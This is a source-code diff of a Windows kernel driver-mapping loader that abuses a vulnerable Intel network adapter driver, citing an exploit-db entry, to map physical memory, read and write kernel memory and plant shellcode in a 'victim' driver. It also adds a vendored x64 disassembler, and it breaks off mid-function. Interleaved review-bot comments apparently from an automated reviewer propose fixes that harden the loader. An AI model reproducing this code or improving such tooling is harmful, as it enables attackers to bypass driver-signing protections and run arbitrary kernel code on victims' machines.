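Review bot: SetupShellCode copies `ConfigurationData->DDTableSize` bytes into `g_MappedData->ConfigurationData` with RtlCopyMemory and never compares that size with the fixed `MAX_CONFIGURATION_DATA_SIZE` array declared in drvmap.h, so an oversized table overruns the MAPPED_CODE_DATA block that was allocated with exactly `sizeof(MAPPED_CODE_DATA)`; add `if (ConfigurationData->DDTableSize > MAX_CONFIGURATION_DATA_SIZE) break;` before the copy. WriteKernelVM annotates its source buffer as `_Out_writes_bytes_(NumberOfBytes) PVOID Buffer` although the routine only reads from it, so the annotation should be `_In_reads_bytes_(NumberOfBytes) PVOID Buffer` to match what NalWriteVirtualMemoryEx is handed. ResolveFunction is the only routine in the file without the `/* Name / Purpose: */` header every other function carries; a header stating that it resolves one export through supGetProcAddress, logs the result and returns 0 when the name is not found would keep the file consistent. In MapTsugumi the `goto Reload` after the CheckMemoryLayout failure leaves the do/while from inside it and skips the `VirtualFree(hdrDriver, 0, MEM_RELEASE)` that follows the loop, so every retry leaks the header page; releasing hdrDriver and setting it to NULL immediately before the goto closes that leak.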
@@ -0,0 +1,52 @@
+/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2020
+*
+* TITLE: DRVMAP.H
+*
+* VERSION: 1.00
+*
+* DATE: 24 Jan 2020
+*
+* Prototypes and definitions for driver mapping.
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+#pragma once
+
+#define MAX_CONFIGURATION_DATA_SIZE 1024
+
+typedef struct _MAPPED_CODE_DATA {
+ // Lock
+ ULONG fInititialized;
+ LONG iNotifyCounter;
+
+ // API pointers
+ PVOID _wcsnicmp;
+ PVOID IoAllocateMdl;
+ PVOID IofCompleteRequest;
+ PVOID IoFreeMdl;
+ PVOID IoDeleteDevice;
+ PVOID IoDeleteSymbolicLink;
+ PVOID KeDelayExecutionThread;
+ PVOID PsGetCurrentProcessId;
+ PVOID PsSetLoadImageNotifyRoutine;
+ PVOID PsRemoveLoadImageNotifyRoutine;
+ PVOID MmProtectMdlSystemAddress;
+ PVOID MmUnmapLockedPages;
+ PVOID MmUnlockPages;
+ PVOID MmProbeAndLockPages;
+ PVOID MmMapLockedPagesSpecifyCache;
+ PVOID RtlInitUnicodeString;
+
+ // data
+ ULONG ConfigurationDataSize;
+ UCHAR ConfigurationData[MAX_CONFIGURATION_DATA_SIZE];
+} MAPPED_CODE_DATA, * PMAPPED_CODE_DATA;
+
+BOOL MapTsugumi(
+ _In_ PTABLE_DESC ConfigurationData);
diff --git a/Source/Kasumi/VBoxPatchGen/global.h b/Source/Zekamashi_v2/loader/global.h
similarity index 51%
rename from Source/Kasumi/VBoxPatchGen/global.h
rename to Source/Zekamashi_v2/loader/global.h
index e180193..998f299 100644
--- a/Source/Kasumi/VBoxPatchGen/global.h
+++ b/Source/Zekamashi_v2/loader/global.h
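Review bot: `_MAPPED_CODE_DATA` is written verbatim into the victim driver's data section by MapTsugumi in drvmap.c and is presumably consumed at fixed offsets by the x64kernelcode blob, so its member order and sizes form an ABI shared with code that is not compiled from this header, and nothing in the header says so. I would add above the typedef: `// Layout is shared with the x64kernelcode blob, which is not built from this header: do not reorder, insert or resize members without rebuilding the blob.` The `// Lock` comment over `fInititialized` and `iNotifyCounter` does not say what either field guards, and `fInititialized` reads as a typo for `fInitialized`, though renaming it would have to be mirrored wherever the same layout is declared for the blob.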
@@ -1,12 +1,12 @@
 /*******************************************************************************
 *
-* (C) COPYRIGHT AUTHORS, 2017 - 2019
+* (C) COPYRIGHT AUTHORS, 2014 - 2020
 *
 * TITLE: GLOBAL.H
 *
-* VERSION: 1.20
+* VERSION: 2.00
 *
-* DATE: 04 Jan 2019
+* DATE: 24 Jan 2020
 *
 * Common header file for the program support routines.
 *
@@ -19,39 +19,32 @@
 //disable nonmeaningful warnings.
 #pragma warning(disable: 4005) // macro redefinition
 #pragma warning(disable: 4201) // nonstandard extension used : nameless struct/union
+#pragma warning(disable: 6320) // Exception-filter expression is the constant EXCEPTION_EXECUTE_HANDLER.
 #if !defined UNICODE
 #error ANSI build is not supported
 #endif
-#if defined (_MSC_VER)
-#if (_MSC_VER >= 1900) //VS15, 17 etc
-#ifdef _DEBUG
-#pragma comment(lib, "vcruntimed.lib")
-#pragma comment(lib, "ucrtd.lib")
-#else
-#pragma comment(lib, "libucrt.lib")
-#pragma comment(lib, "libvcruntime.lib")
-#endif
-#endif
-#endif
-
 #include
+#include
 #include
-#include "ntos.h"
-#include "minirtl\minirtl.h"
-#include "minirtl\cmdline.h"
-#include "cui.h"
+#include "ntdll/ntos.h"
+
+#define _NTDEF_
+#include
+#undef _NTDEF_
+
+#include "resource.h"
+#include "minirtl/minirtl.h"
+#include "minirtl/cmdline.h"
+#include "hde/hde64.h"
 #include "patterns.h"
+#include "consts.h"
+#include "sup.h"
+#include "idrv/nal.h"
+#include "victim.h"
+#include "drvmap.h"
-typedef struct _BINARY_PATCH_BLOCK {
- ULONG VirtualOffset;
- UCHAR DataLength;
- UCHAR Data[1];
-} BINARY_PATCH_BLOCK, *PBINARY_PATCH_BLOCK;
+#define T_PRNTDEFAULT "%s\r\n"
-typedef struct _BINARY_PATCH_BLOCK_INTERNAL {
- ULONG VirtualOffset;
- UCHAR DataLength;
- UCHAR Data[32];
-} BINARY_PATCH_BLOCK_INTERNAL, *PBINARY_PATCH_BLOCK_INTERNAL;
+extern ULONG_PTR g_MaximumUserModeAddress;
diff --git a/Source/Zekamashi_v2/loader/hde/hde64.c b/Source/Zekamashi_v2/loader/hde/hde64.c
new file mode 100644
index 0000000..76e8a51
--- /dev/null
+++ b/Source/Zekamashi_v2/loader/hde/hde64.c
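Review bot: The added `#pragma warning(disable: 6320)` sits in global.h, so the analyzer warning about an `__except(EXCEPTION_EXECUTE_HANDLER)` filter catching every exception type is silenced in every translation unit that includes this header, not only at the one handler that motivates it (QueryDriverUnloadOffset in drvmap.c). Wrapping that single handler in `#pragma warning(push)` / `#pragma warning(disable: 6320)` / `#pragma warning(pop)`, the way hde64.c in this same commit scopes 4701 and 4706, keeps the warning live for any handler added later. The `#define _NTDEF_` / `#undef _NTDEF_` pair around the following include is also unexplained; a one-line comment naming which definitions it is meant to keep the system header from redeclaring would spare the next maintainer from rediscovering it.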
@@ -0,0 +1,338 @@ +/* + * Hacker Disassembler Engine 64 C + * Copyright (c) 2008-2009, Vyacheslav Patkov. + * All rights reserved. + * + */ + +#include "hde64.h" +#include "table64.h" + +#pragma warning(push) +#pragma warning(disable:4701) +#pragma warning(disable:4706) + +unsigned int hde64_disasm(const void *code, hde64s *hs) +{ + uint8_t x, c = 0, *p = (uint8_t *)code, cflags, opcode, pref = 0; + uint8_t *ht = hde64_table, m_mod, m_reg, m_rm, disp_size = 0; + uint8_t op64 = 0; + + // Avoid using memset to reduce the footprint. +#ifndef _MSC_VER + memset((LPBYTE)hs, 0, sizeof(hde64s)); +#else + __stosb((LPBYTE)hs, 0, sizeof(hde64s)); +#endif + + for (x = 16; x; x--) + switch (c = *p++) { + case 0xf3: + hs->p_rep = c; + pref |= PRE_F3; + break; + case 0xf2: + hs->p_rep = c; + pref |= PRE_F2; + break; + case 0xf0: + hs->p_lock = c; + pref |= PRE_LOCK; + break; + case 0x26: case 0x2e: case 0x36: + case 0x3e: case 0x64: case 0x65: + hs->p_seg = c; + pref |= PRE_SEG; + break; + case 0x66: + hs->p_66 = c; + pref |= PRE_66; + break; + case 0x67: + hs->p_67 = c; + pref |= PRE_67; + break; + default: + goto pref_done; + } + pref_done: + + hs->flags = (uint32_t)pref << 23; + + if (!pref) + pref |= PRE_NONE; + + if ((c & 0xf0) == 0x40) { + hs->flags |= F_PREFIX_REX; + if ((hs->rex_w = (c & 0xf) >> 3) && (*p & 0xf8) == 0xb8) + op64++; + hs->rex_r = (c & 7) >> 2; + hs->rex_x = (c & 3) >> 1; + hs->rex_b = c & 1; + if (((c = *p++) & 0xf0) == 0x40) { + opcode = c; + goto error_opcode; + } + } + + if ((hs->opcode = c) == 0x0f) { + hs->opcode2 = c = *p++; + ht += DELTA_OPCODES; + } else if (c >= 0xa0 && c <= 0xa3) { + op64++; + if (pref & PRE_67) + pref |= PRE_66; + else + pref &= ~PRE_66; + } + + opcode = c; + cflags = ht[ht[opcode / 4] + (opcode % 4)]; + + if (cflags == C_ERROR) { + error_opcode: + hs->flags |= F_ERROR | F_ERROR_OPCODE; + cflags = 0; + if ((opcode & -3) == 0x24) + cflags++; + } + + x = 0; + if (cflags & C_GROUP) { + uint16_t t; + t = *(uint16_t *)(ht + (cflags & 
0x7f)); + cflags = (uint8_t)t; + x = (uint8_t)(t >> 8); + } + + if (hs->opcode2) { + ht = hde64_table + DELTA_PREFIXES; + if (ht[ht[opcode / 4] + (opcode % 4)] & pref) + hs->flags |= F_ERROR | F_ERROR_OPCODE; + } + + if (cflags & C_MODRM) { + hs->flags |= F_MODRM; + hs->modrm = c = *p++; + hs->modrm_mod = m_mod = c >> 6; + hs->modrm_rm = m_rm = c & 7; + hs->modrm_reg = m_reg = (c & 0x3f) >> 3; + + if (x && ((x << m_reg) & 0x80)) + hs->flags |= F_ERROR | F_ERROR_OPCODE; + + if (!hs->opcode2 && opcode >= 0xd9 && opcode <= 0xdf) { + uint8_t t = opcode - 0xd9; + if (m_mod == 3) { + ht = hde64_table + DELTA_FPU_MODRM + t*8; + t = ht[m_reg] << m_rm; + } else { + ht = hde64_table + DELTA_FPU_REG; + t = ht[t] << m_reg; + } + if (t & 0x80) + hs->flags |= F_ERROR | F_ERROR_OPCODE; + } + + if (pref & PRE_LOCK) { + if (m_mod == 3) { + hs->flags |= F_ERROR | F_ERROR_LOCK; + } else { + uint8_t *table_end, op = opcode; + if (hs->opcode2) { + ht = hde64_table + DELTA_OP2_LOCK_OK; + table_end = ht + DELTA_OP_ONLY_MEM - DELTA_OP2_LOCK_OK; + } else { + ht = hde64_table + DELTA_OP_LOCK_OK; + table_end = ht + DELTA_OP2_LOCK_OK - DELTA_OP_LOCK_OK; + op &= -2; + } + for (; ht != table_end; ht++) + if (*ht++ == op) { + if (!((*ht << m_reg) & 0x80)) + goto no_lock_error; + else + break; + } + hs->flags |= F_ERROR | F_ERROR_LOCK; + no_lock_error: + ; + } + } + + if (hs->opcode2) { + switch (opcode) { + case 0x20: case 0x22: + m_mod = 3; + if (m_reg > 4 || m_reg == 1) + goto error_operand; + else + goto no_error_operand; + case 0x21: case 0x23: + m_mod = 3; + if (m_reg == 4 || m_reg == 5) + goto error_operand; + else + goto no_error_operand; + } + } else { + switch (opcode) { + case 0x8c: + if (m_reg > 5) + goto error_operand; + else + goto no_error_operand; + case 0x8e: + if (m_reg == 1 || m_reg > 5) + goto error_operand; + else + goto no_error_operand; + } + } + + if (m_mod == 3) { + uint8_t *table_end; + if (hs->opcode2) { + ht = hde64_table + DELTA_OP2_ONLY_MEM; + table_end = ht + 
sizeof(hde64_table) - DELTA_OP2_ONLY_MEM; + } else { + ht = hde64_table + DELTA_OP_ONLY_MEM; + table_end = ht + DELTA_OP2_ONLY_MEM - DELTA_OP_ONLY_MEM; + } + for (; ht != table_end; ht += 2) + if (*ht++ == opcode) { + if (*ht++ & pref && !((*ht << m_reg) & 0x80)) + goto error_operand; + else + break; + } + goto no_error_operand; + } else if (hs->opcode2) { + switch (opcode) { + case 0x50: case 0xd7: case 0xf7: + if (pref & (PRE_NONE | PRE_66)) + goto error_operand; + break; + case 0xd6: + if (pref & (PRE_F2 | PRE_F3)) + goto error_operand; + break; + case 0xc5: + goto error_operand; + } + goto no_error_operand; + } else + goto no_error_operand; + + error_operand: + hs->flags |= F_ERROR | F_ERROR_OPERAND; + no_error_operand: + + c = *p++; + if (m_reg <= 1) { + if (opcode == 0xf6) + cflags |= C_IMM8; + else if (opcode == 0xf7) + cflags |= C_IMM_P66; + } + + switch (m_mod) { + case 0: + if (pref & PRE_67) { + if (m_rm == 6) + disp_size = 2; + } else + if (m_rm == 5) + disp_size = 4; + break; + case 1: + disp_size = 1; + break; + case 2: + disp_size = 2; + if (!(pref & PRE_67)) + disp_size <<= 1; + } + + if (m_mod != 3 && m_rm == 4) { + hs->flags |= F_SIB; + p++; + hs->sib = c; + hs->sib_scale = c >> 6; + hs->sib_index = (c & 0x3f) >> 3; + if ((hs->sib_base = c & 7) == 5 && !(m_mod & 1)) + disp_size = 4; + } + + p--; + switch (disp_size) { + case 1: + hs->flags |= F_DISP8; + hs->disp.disp8 = *p; + break; + case 2: + hs->flags |= F_DISP16; + hs->disp.disp16 = *(uint16_t *)p; + break; + case 4: + hs->flags |= F_DISP32; + hs->disp.disp32 = *(uint32_t *)p; + } + p += disp_size; + } else if (pref & PRE_LOCK) + hs->flags |= F_ERROR | F_ERROR_LOCK; + + if (cflags & C_IMM_P66) { + if (cflags & C_REL32) { + if (pref & PRE_66) { + hs->flags |= F_IMM16 | F_RELATIVE; + hs->imm.imm16 = *(uint16_t *)p; + p += 2; + goto disasm_done; + } + goto rel32_ok; + } + if (op64) { + hs->flags |= F_IMM64; + hs->imm.imm64 = *(uint64_t *)p; + p += 8; + } else if (!(pref & PRE_66)) { + hs->flags 
|= F_IMM32; + hs->imm.imm32 = *(uint32_t *)p; + p += 4; + } else + goto imm16_ok; + } + + + if (cflags & C_IMM16) { + imm16_ok: + hs->flags |= F_IMM16; + hs->imm.imm16 = *(uint16_t *)p; + p += 2; + } + if (cflags & C_IMM8) { + hs->flags |= F_IMM8; + hs->imm.imm8 = *p++; + } + + if (cflags & C_REL32) { + rel32_ok: + hs->flags |= F_IMM32 | F_RELATIVE; + hs->imm.imm32 = *(uint32_t *)p; + p += 4; + } else if (cflags & C_REL8) { + hs->flags |= F_IMM8 | F_RELATIVE; + hs->imm.imm8 = *p++; + } + + disasm_done: + + if ((hs->len = (uint8_t)(p-(uint8_t *)code)) > 15) { + hs->flags |= F_ERROR | F_ERROR_LENGTH; + hs->len = 15; + } + + return (unsigned int)hs->len; +} +#pragma warning(pop) diff --git a/Source/Zekamashi_v2/loader/hde/hde64.h b/Source/Zekamashi_v2/loader/hde/hde64.h new file mode 100644 index 0000000..ecbf4df --- /dev/null +++ b/Source/Zekamashi_v2/loader/hde/hde64.h 
@@ -0,0 +1,112 @@ +/* + * Hacker Disassembler Engine 64 + * Copyright (c) 2008-2009, Vyacheslav Patkov. + * All rights reserved. + * + * hde64.h: C/C++ header file + * + */ + +#ifndef _HDE64_H_ +#define _HDE64_H_ + +/* stdint.h - C99 standard header + * http://en.wikipedia.org/wiki/stdint.h + * + * if your compiler doesn't contain "stdint.h" header (for + * example, Microsoft Visual C++), you can download file: + * http://www.azillionmonkeys.com/qed/pstdint.h + * and change next line to: + * #include "pstdint.h" + */ +#include "pstdint.h" + +#define F_MODRM 0x00000001 +#define F_SIB 0x00000002 +#define F_IMM8 0x00000004 +#define F_IMM16 0x00000008 +#define F_IMM32 0x00000010 +#define F_IMM64 0x00000020 +#define F_DISP8 0x00000040 +#define F_DISP16 0x00000080 +#define F_DISP32 0x00000100 +#define F_RELATIVE 0x00000200 +#define F_ERROR 0x00001000 +#define F_ERROR_OPCODE 0x00002000 +#define F_ERROR_LENGTH 0x00004000 +#define F_ERROR_LOCK 0x00008000 +#define F_ERROR_OPERAND 0x00010000 +#define F_PREFIX_REPNZ 0x01000000 +#define F_PREFIX_REPX 0x02000000 +#define F_PREFIX_REP 0x03000000 +#define F_PREFIX_66 0x04000000 +#define F_PREFIX_67 0x08000000 +#define F_PREFIX_LOCK 0x10000000 +#define F_PREFIX_SEG 0x20000000 +#define F_PREFIX_REX 0x40000000 +#define F_PREFIX_ANY 0x7f000000 + +#define PREFIX_SEGMENT_CS 0x2e +#define PREFIX_SEGMENT_SS 0x36 +#define PREFIX_SEGMENT_DS 0x3e +#define PREFIX_SEGMENT_ES 0x26 +#define PREFIX_SEGMENT_FS 0x64 +#define PREFIX_SEGMENT_GS 0x65 +#define PREFIX_LOCK 0xf0 +#define PREFIX_REPNZ 0xf2 +#define PREFIX_REPX 0xf3 +#define PREFIX_OPERAND_SIZE 0x66 +#define PREFIX_ADDRESS_SIZE 0x67 + +#pragma pack(push,1) + +typedef struct { + uint8_t len; + uint8_t p_rep; + uint8_t p_lock; + uint8_t p_seg; + uint8_t p_66; + uint8_t p_67; + uint8_t rex; + uint8_t rex_w; + uint8_t rex_r; + uint8_t rex_x; + uint8_t rex_b; + uint8_t opcode; + uint8_t opcode2; + uint8_t modrm; + uint8_t modrm_mod; + uint8_t modrm_reg; + uint8_t modrm_rm; + uint8_t sib; + 
uint8_t sib_scale; + uint8_t sib_index; + uint8_t sib_base; + union { + uint8_t imm8; + uint16_t imm16; + uint32_t imm32; + uint64_t imm64; + } imm; + union { + uint8_t disp8; + uint16_t disp16; + uint32_t disp32; + } disp; + uint32_t flags; +} hde64s; + +#pragma pack(pop) + +#ifdef __cplusplus +extern "C" { +#endif + +/* __cdecl */ +unsigned int hde64_disasm(const void *code, hde64s *hs); + +#ifdef __cplusplus +} +#endif + +#endif /* _HDE64_H_ */ diff --git a/Source/Zekamashi_v2/loader/hde/pstdint.h b/Source/Zekamashi_v2/loader/hde/pstdint.h new file mode 100644 index 0000000..5b7c5f0 --- /dev/null +++ b/Source/Zekamashi_v2/loader/hde/pstdint.h 
@@ -0,0 +1,39 @@ +/* + * MinHook - The Minimalistic API Hooking Library for x64/x86 + * Copyright (C) 2009-2015 Tsuda Kageyu. All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions + * are met: + * + * 1. Redistributions of source code must retain the above copyright + * notice, this list of conditions and the following disclaimer. + * 2. Redistributions in binary form must reproduce the above copyright + * notice, this list of conditions and the following disclaimer in the + * documentation and/or other materials provided with the distribution. + * + * THIS SOFTWARE IS PROVIDED BY THE AUTHOR "AS IS" AND ANY EXPRESS OR + * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES + * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. + * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, + * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT + * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, + * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY + * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT + * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF + * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ + +#pragma once + +#include + +// Integer types for HDE. +typedef INT8 int8_t; +typedef INT16 int16_t; +typedef INT32 int32_t; +typedef INT64 int64_t; +typedef UINT8 uint8_t; +typedef UINT16 uint16_t; +typedef UINT32 uint32_t; +typedef UINT64 uint64_t; diff --git a/Source/Zekamashi_v2/loader/hde/table64.h b/Source/Zekamashi_v2/loader/hde/table64.h new file mode 100644 index 0000000..01d4541 --- /dev/null +++ b/Source/Zekamashi_v2/loader/hde/table64.h 
@@ -0,0 +1,74 @@ +/* + * Hacker Disassembler Engine 64 C + * Copyright (c) 2008-2009, Vyacheslav Patkov. + * All rights reserved. + * + */ + +#define C_NONE 0x00 +#define C_MODRM 0x01 +#define C_IMM8 0x02 +#define C_IMM16 0x04 +#define C_IMM_P66 0x10 +#define C_REL8 0x20 +#define C_REL32 0x40 +#define C_GROUP 0x80 +#define C_ERROR 0xff + +#define PRE_ANY 0x00 +#define PRE_NONE 0x01 +#define PRE_F2 0x02 +#define PRE_F3 0x04 +#define PRE_66 0x08 +#define PRE_67 0x10 +#define PRE_LOCK 0x20 +#define PRE_SEG 0x40 +#define PRE_ALL 0xff + +#define DELTA_OPCODES 0x4a +#define DELTA_FPU_REG 0xfd +#define DELTA_FPU_MODRM 0x104 +#define DELTA_PREFIXES 0x13c +#define DELTA_OP_LOCK_OK 0x1ae +#define DELTA_OP2_LOCK_OK 0x1c6 +#define DELTA_OP_ONLY_MEM 0x1d8 +#define DELTA_OP2_ONLY_MEM 0x1e7 + +unsigned char hde64_table[] = { + 0xa5,0xaa,0xa5,0xb8,0xa5,0xaa,0xa5,0xaa,0xa5,0xb8,0xa5,0xb8,0xa5,0xb8,0xa5, + 0xb8,0xc0,0xc0,0xc0,0xc0,0xc0,0xc0,0xc0,0xc0,0xac,0xc0,0xcc,0xc0,0xa1,0xa1, + 0xa1,0xa1,0xb1,0xa5,0xa5,0xa6,0xc0,0xc0,0xd7,0xda,0xe0,0xc0,0xe4,0xc0,0xea, + 0xea,0xe0,0xe0,0x98,0xc8,0xee,0xf1,0xa5,0xd3,0xa5,0xa5,0xa1,0xea,0x9e,0xc0, + 0xc0,0xc2,0xc0,0xe6,0x03,0x7f,0x11,0x7f,0x01,0x7f,0x01,0x3f,0x01,0x01,0xab, + 0x8b,0x90,0x64,0x5b,0x5b,0x5b,0x5b,0x5b,0x92,0x5b,0x5b,0x76,0x90,0x92,0x92, + 0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x6a,0x73,0x90, + 0x5b,0x52,0x52,0x52,0x52,0x5b,0x5b,0x5b,0x5b,0x77,0x7c,0x77,0x85,0x5b,0x5b, + 0x70,0x5b,0x7a,0xaf,0x76,0x76,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b, + 0x5b,0x5b,0x86,0x01,0x03,0x01,0x04,0x03,0xd5,0x03,0xd5,0x03,0xcc,0x01,0xbc, + 0x03,0xf0,0x03,0x03,0x04,0x00,0x50,0x50,0x50,0x50,0xff,0x20,0x20,0x20,0x20, + 0x01,0x01,0x01,0x01,0xc4,0x02,0x10,0xff,0xff,0xff,0x01,0x00,0x03,0x11,0xff, + 0x03,0xc4,0xc6,0xc8,0x02,0x10,0x00,0xff,0xcc,0x01,0x01,0x01,0x00,0x00,0x00, + 0x00,0x01,0x01,0x03,0x01,0xff,0xff,0xc0,0xc2,0x10,0x11,0x02,0x03,0x01,0x01, + 0x01,0xff,0xff,0xff,0x00,0x00,0x00,0xff,0x00,0x00,0xff,0xff,0xff,0xff,0x10, + 
0x10,0x10,0x10,0x02,0x10,0x00,0x00,0xc6,0xc8,0x02,0x02,0x02,0x02,0x06,0x00, + 0x04,0x00,0x02,0xff,0x00,0xc0,0xc2,0x01,0x01,0x03,0x03,0x03,0xca,0x40,0x00, + 0x0a,0x00,0x04,0x00,0x00,0x00,0x00,0x7f,0x00,0x33,0x01,0x00,0x00,0x00,0x00, + 0x00,0x00,0xff,0xbf,0xff,0xff,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0xff,0x00, + 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff, + 0x00,0x00,0x00,0xbf,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x7f,0x00,0x00, + 0xff,0x40,0x40,0x40,0x40,0x41,0x49,0x40,0x40,0x40,0x40,0x4c,0x42,0x40,0x40, + 0x40,0x40,0x40,0x40,0x40,0x40,0x4f,0x44,0x53,0x40,0x40,0x40,0x44,0x57,0x43, + 0x5c,0x40,0x60,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40, + 0x40,0x40,0x64,0x66,0x6e,0x6b,0x40,0x40,0x6a,0x46,0x40,0x40,0x44,0x46,0x40, + 0x40,0x5b,0x44,0x40,0x40,0x00,0x00,0x00,0x00,0x06,0x06,0x06,0x06,0x01,0x06, + 0x06,0x02,0x06,0x06,0x00,0x06,0x00,0x0a,0x0a,0x00,0x00,0x00,0x02,0x07,0x07, + 0x06,0x02,0x0d,0x06,0x06,0x06,0x0e,0x05,0x05,0x02,0x02,0x00,0x00,0x04,0x04, + 0x04,0x04,0x05,0x06,0x06,0x06,0x00,0x00,0x00,0x0e,0x00,0x00,0x08,0x00,0x10, + 0x00,0x18,0x00,0x20,0x00,0x28,0x00,0x30,0x00,0x80,0x01,0x82,0x01,0x86,0x00, + 0xf6,0xcf,0xfe,0x3f,0xab,0x00,0xb0,0x00,0xb1,0x00,0xb3,0x00,0xba,0xf8,0xbb, + 0x00,0xc0,0x00,0xc1,0x00,0xc7,0xbf,0x62,0xff,0x00,0x8d,0xff,0x00,0xc4,0xff, + 0x00,0xc5,0xff,0x00,0xff,0xff,0xeb,0x01,0xff,0x0e,0x12,0x08,0x00,0x13,0x09, + 0x00,0x16,0x08,0x00,0x17,0x09,0x00,0x2b,0x09,0x00,0xae,0xff,0x07,0xb2,0xff, + 0x00,0xb4,0xff,0x00,0xb5,0xff,0x00,0xc3,0x01,0x00,0xc7,0xff,0xbf,0xe7,0x08, + 0x00,0xf0,0x02,0x00 +}; diff --git a/Source/Zekamashi_v2/loader/idrv/nal.c b/Source/Zekamashi_v2/loader/idrv/nal.c new file mode 100644 index 0000000..3d3d5e5 --- /dev/null +++ b/Source/Zekamashi_v2/loader/idrv/nal.c 
@@ -0,0 +1,385 @@ +/******************************************************************************* +* +* (C) COPYRIGHT AUTHORS, 2020 +* +* TITLE: NAL.C +* +* VERSION: 1.00 +* +* DATE: 07 Jan 2020 +* +* Intel Network Adapter iQVM64 driver routines. +* +* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF +* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED +* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A +* PARTICULAR PURPOSE. +* +*******************************************************************************/ + +#include "global.h" +#include "idrv/nal.h" + +// +// Based on https://www.exploit-db.com/exploits/36392 +// + +/* +* NalCallDriver +* +* Purpose: +* +* Call Intel Nal driver. +* +*/ +BOOL NalCallDriver( + _In_ HANDLE DeviceHandle, + _In_ PVOID Buffer, + _In_ ULONG Size) +{ + BOOL bResult = FALSE; + IO_STATUS_BLOCK ioStatus; + + NTSTATUS ntStatus = NtDeviceIoControlFile(DeviceHandle, + NULL, + NULL, + NULL, + &ioStatus, + IOCTL_NAL_MANAGE, + Buffer, + Size, + NULL, + 0); + + bResult = NT_SUCCESS(ntStatus); + SetLastError(RtlNtStatusToDosError(ntStatus)); + return bResult; +} + +/* +* NalMapAddressEx +* +* Purpose: +* +* Call MmMapIoSpace via Nal driver, return kernel mode virtual address. 
+* +*/ +BOOL NalMapAddressEx( + _In_ HANDLE DeviceHandle, + _In_ ULONG_PTR PhysicalAddress, + _Out_ ULONG_PTR* VirtualAddress, + _In_ ULONG NumberOfBytes) +{ + BOOL bResult = FALSE; + DWORD dwError = ERROR_SUCCESS; + NAL_MAP_IO_SPACE request; + + if (VirtualAddress) + *VirtualAddress = 0; + else + return FALSE; + + RtlSecureZeroMemory(&request, sizeof(request)); + request.Header.FunctionId = NAL_FUNCID_MAPIOSPACE; + request.PhysicalAddress = PhysicalAddress; + request.NumberOfBytes = NumberOfBytes; + + if (NalCallDriver(DeviceHandle, &request, sizeof(request))) { + if (request.OpResult == 0) { + *VirtualAddress = request.VirtualAddress; + bResult = TRUE; + } + else { + dwError = ERROR_INTERNAL_ERROR; + } + } + else { + dwError = GetLastError(); + } + SetLastError(dwError); + return bResult; +} + +/* +* NalUnmapAddress +* +* Purpose: +* +* Call MmUnmapIoSpace via Nal driver. +* +*/ +BOOL NalUnmapAddress( + _In_ HANDLE DeviceHandle, + _In_ ULONG_PTR VirtualAddress, + _In_ ULONG NumberOfBytes) +{ + BOOL bResult = FALSE; + DWORD dwError = ERROR_SUCCESS; + NAL_UNMAP_IO_SPACE request; + + RtlSecureZeroMemory(&request, sizeof(request)); + request.Header.FunctionId = NAL_FUNCID_UNMAPIOSPACE; + request.VirtualAddress = VirtualAddress; + request.NumberOfBytes = NumberOfBytes; + + if (NalCallDriver(DeviceHandle, &request, sizeof(request))) { + bResult = (request.OpResult == 0); + if (bResult == FALSE) + dwError = ERROR_NONE_MAPPED; + } + else { + dwError = GetLastError(); + } + + SetLastError(dwError); + return bResult; +} + +/* +* NalVirtualToPhysical +* +* Purpose: +* +* Translate virtual address to the physical. +* +* N.B. +* Call driver Intel Nal driver MmGetVirtualForPhysical switch case. 
+* +*/ +BOOL NalVirtualToPhysical( + _In_ HANDLE DeviceHandle, + _In_ ULONG_PTR VirtualAddress, + _Out_ ULONG_PTR* PhysicalAddress) +{ + BOOL bResult = FALSE; + DWORD dwError = ERROR_SUCCESS; + NAL_GET_PHYSICAL_ADDRESS request; + + if (PhysicalAddress) + *PhysicalAddress = 0; + else { + SetLastError(ERROR_INVALID_PARAMETER); + return FALSE; + } + + RtlSecureZeroMemory(&request, sizeof(request)); + request.Header.FunctionId = NAL_FUNCID_VIRTUALTOPHYSCAL; + request.VirtualAddress = VirtualAddress; + + if (NalCallDriver(DeviceHandle, &request, sizeof(request))) { + *PhysicalAddress = request.PhysicalAddress; + bResult = TRUE; + } + else { + dwError = GetLastError(); + } + + SetLastError(dwError); + return bResult; +} + +/* +* NalReadVirtualMemory +* +* Purpose: +* +* Read virtual memory via Nal memmove switch case. +* +*/ +_Success_(return != FALSE) +BOOL NalReadVirtualMemory( + _In_ HANDLE DeviceHandle, + _In_ ULONG_PTR VirtualAddress, + _Out_writes_bytes_(NumberOfBytes) PVOID Buffer, + _In_ ULONG NumberOfBytes) +{ + BOOL bResult = FALSE; + DWORD 